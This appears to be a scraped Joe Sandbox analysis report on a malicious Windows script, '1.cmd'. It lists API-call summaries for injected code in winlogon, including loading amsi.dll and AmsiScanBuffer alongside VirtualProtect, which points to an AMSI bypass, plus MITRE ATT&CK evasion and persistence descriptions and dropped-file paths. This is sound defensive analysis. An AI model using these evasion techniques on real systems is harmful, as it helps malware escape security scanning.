GetCurrentThreadId.KERNEL32 ref: 00000225DC6462AB
GetThreadContext.KERNEL32 ref: 00000225DC646415

Part of subcall function 00000225DC6460A0: GetCurrentThreadId.KERNEL32 ref: 00000225DC6460A4

Memory Dump Source

Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
Instruction ID: 295b081cb87bf85b7e110addeb5a6b591f47254ecbc1534d835875b48c3d2520
Opcode Fuzzy Hash: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
Instruction Fuzzy Hash: 6DD1AE3A20CF9891DA70DB9AE49835A77A0F3C8B89F108156EACE47769DF3DC551CB04

Function 00000225DC641E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000225DC641E47
GetProcAddress.KERNEL32 ref: 00000225DC641E57
SleepEx.KERNELBASE ref: 00000225DC641E67

Strings

amsi.dll, xrefs: 00000225DC641E40
AmsiScanBuffer, xrefs: 00000225DC641E50

Memory Dump Source

Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: b943b4d4fec2722a97f31a6593bd222e515073a37d9d17746b47865a0752c427
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 02D0671C625E24F6EE186B9DE89C7543261AB68B03FE49455C50B012A0EE3C8559C340

Function 00000225DC643EC8 Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F0E
VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F47
VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F68

Memory Dump Source

Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 5ab4cc4c86de14b28b7657dd2b04d766b10610f425967c1e4ffea0a6bb593b99
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: B511422A619B50A3EB649B69E40821E77B0FB44B81F148036DE4E03794EB7DC954C784

Function 00000225DC612EBC Relevance: 6.2, APIs: 4, Instructions: 240memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00000225DC612F7B
VirtualProtect.KERNELBASE ref: 00000225DC612FA5
LoadLibraryA.KERNELBASE ref: 00000225DC61302E
VirtualProtect.KERNELBASE ref: 00000225DC6131C2

Memory Dump Source

Source File: 00000027.00000003.2452012682.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_225dc610000_winlogon.jbxd

Similarity

API ID: Virtual$Protect$AllocLibraryLoad
String ID:
API String ID: 3316853933-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 7c9ff1a1260ec0b76c18c2d9cc77086b54c9427e4fe21390ef94f9dc999a9e53
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 399126BAB02E6097EF648F69D409B6DB391F754FABF54C1349E4A07788DA38D812C700

Function 00000225DC643A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000225DC643A35
PathFindFileNameW.SHLWAPI ref: 00000225DC643A44

Part of subcall function 00000225DC643F88: StrCmpNIW.SHLWAPI(?,?,?,00000225DC64272F), ref: 00000225DC643FA0

Part of subcall function 00000225DC643EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643EDB
Part of subcall function 00000225DC643EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F0E
Part of subcall function 00000225DC643EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F2E
Part of subcall function 00000225DC643EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F47
Part of subcall function 00000225DC643EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F68

CreateThread.KERNELBASE ref: 00000225DC643A8B

Part of subcall function 00000225DC641E74: GetCurrentThread.KERNEL32 ref: 00000225DC641E7F
Part of subcall function 00000225DC641E74: CreateThread.KERNELBASE ref: 00000225DC642043
Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642049
Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642055
Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642061
Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC64206D
Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642079
Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642085

Memory Dump Source

Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 130d4905f5eea26d9371d1b1ff51420db667a30803bfba8bb2bd091ed1f53f6f
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: F611B13D66CE29B2FB60ABEDE54D7AD3290AB84B47F50C0B99507811D0EF3DC484C600

Function 00000225DC641BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000225DC641724: GetProcessHeap.KERNEL32 ref: 00000225DC64172F
Part of subcall function 00000225DC641724: HeapAlloc.KERNEL32 ref: 00000225DC64173E
Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417AE
Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417DB
Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6417F5
Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641815
Part of subcall function 00000225DC641724: RegCloseKey.KERNELBASE ref: 00000225DC641830
Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641850
Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC64186B
Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC64188B
Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6418A6
Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6418C6

SleepEx.KERNELBASE ref: 00000225DC641BDF

Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6418E1
Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641901
Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC64191C
Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC64193C
Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC641957
Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641977
Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC641992
Part of subcall function 00000225DC641724: RegCloseKey.KERNELBASE ref: 00000225DC64199C

Memory Dump Source

Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 12f4e7bf2d043a765a3ac4f019d2c82d455fc7f3fa1118b40d32223ae48c856c
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 363135AD32CE61A1FB549BAED9583A933A4EB44BC6F04D4A18E0B973D5DF38C850C214

Function 00000225DC67F370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00000225DC67F390

Memory Dump Source

Source File: 00000027.00000002.3001527612.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true

Associated: 00000027.00000002.3000144503.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.3002985016.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.3004370938.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.3005534775.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.3006762105.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_225dc670000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: a9a0868b07df84503d79fe2f89049b18ceebf10007afb1c3b1b6b2ac5b3c783d
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: 91D01229731950D3F300DF51D8497956328F79C702FD08005E94AC6694DF7CC259CB51

Function 00000225DC64F370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00000225DC64F390

Memory Dump Source

Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: 91454ba34573355ff24e871c1f84efd327f9d9e1a896de9ceab491d5d3354271
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: 4CD01229735950D3E300DF61D8497966328F39C702FD08005E98A82694DF7CC259CB50

Function 00000225DC67D220 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(?,?,00000000,00000225DC67C987), ref: 00000225DC67D275

Memory Dump Source

Source File: 00000027.00000002.3001527612.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true

Associated: 00000027.00000002.3000144503.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.3002985016.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.3004370938.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.3005534775.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.3006762105.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_225dc670000_winlogon.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
Instruction ID: 8c995a941c99dfe8ec91a527983bcfb77f5d6b3f54302bc86fbf6d4b88a72ef6
Opcode Fuzzy Hash: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
Instruction Fuzzy Hash: D1F0B42C306E20B1FF9597ED580C3A412905F99B42F1CDC308E1A8ABC5ED3CC58AC211

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1.cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_9f80d8da-31df-4b2c-bcfb-31830925e2b8\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_fa750e7d-2e62-4703-86c1-e8771ad7fadd\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3551.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER38BD.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER392B.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER604E.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6446.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6476.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3bbo2kri.le0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qgxuuvs.0li.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b32b30w1.tgj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5r0ihk5.kzs.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_squa0cl3.qra.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uy1ul2eh.yqr.psm1

C:\Users\user\AppData\Roaming\$nya-Logs\2024-10-04

C:\Users\user\Documents\20241004\PowerShell_transcript.128757.CxMBvNgr.20241004034233.txt

Windows Analysis Report
1.cmd

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
